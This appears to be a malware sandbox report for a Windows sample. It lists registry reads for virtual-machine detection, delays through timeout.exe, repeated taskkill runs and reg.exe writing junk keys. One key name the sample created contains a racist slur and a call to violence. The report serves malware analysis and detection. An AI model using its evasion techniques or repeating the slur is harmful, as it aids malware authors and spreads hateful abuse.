Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 C:\Windows\system32\powercfg.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" N/A N/A
Key created \REGISTRY\USER\S-1-5-20\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing N/A N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" N/A N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" N/A N/A
Key created \REGISTRY\USER\S-1-5-20\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-20 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache N/A N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ C:\Windows\system32\reg.exe N/A
Key created \Registry\User\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings C:\Windows\system32\reg.exe N/A
